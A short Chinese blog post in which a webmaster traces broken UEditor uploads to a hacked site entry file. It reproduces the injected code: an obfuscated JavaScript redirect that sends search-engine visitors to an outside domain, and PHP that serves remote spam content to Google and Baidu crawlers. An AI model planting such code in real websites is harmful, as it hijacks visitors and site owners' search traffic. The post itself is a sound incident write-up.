上线的网站莫名其妙的突然出现ueditor的上传功能不能正常使用,console控制台提示
后台配置项返回格式出错,上传功能将不能正常使用!
日常百度、google发现没有和我的情况比较匹配的,他们出现这种原因多是ueditor的配置问题,但我之前都是可以用的,再用本地的备份代码测试也没问题。
然后查看网络请求,发现图片上传完之后返回的json数据之前还带了下面这段代码:
<script type="text/javascript">
var ct_O1 = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x72\x65\x66\x65\x72\x72\x65\x72"]
if (ct_O1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x67\x6f\x6f\x67\x6c\x65") > 0 || ct_O1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x62\x61\x69\x64\x75") > 0 || ct_O1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x73\x6f\x67\x6f\x75") > 0) location["\x68\x72\x65\x66"] = "\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x79\x63\x35\x35\x35\x38\x2e\x63\x6f\x6d";
</script>
趁着网站整体还没有大问题,把数据库和代码备份一下。接着把代码下载到本地,显示着用杀软查杀一下,发现没有任何效果,然后自己手动全局查找,发现入口文件被篡改。
入口文件头部被添加了如下的代码:
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false)
{
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$file = file_get_contents('http://yc.rvvzz.com/bak/'."/index.php?host=".$host_name."&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['SERVER_NAME']);
echo $file;
}
?>
<script type="text/javascript">
var ct_O1 = window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x72\x65\x66\x65\x72\x72\x65\x72"]
if (ct_O1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x67\x6f\x6f\x67\x6c\x65") > 0 || ct_O1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x62\x61\x69\x64\x75") > 0 || ct_O1["\x69\x6e\x64\x65\x78\x4f\x66"]("\x73\x6f\x67\x6f\x75") > 0) location["\x68\x72\x65\x66"] = "\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x79\x63\x35\x35\x35\x38\x2e\x63\x6f\x6d";
</script><?php
有急事先这样,处理流程待续。。。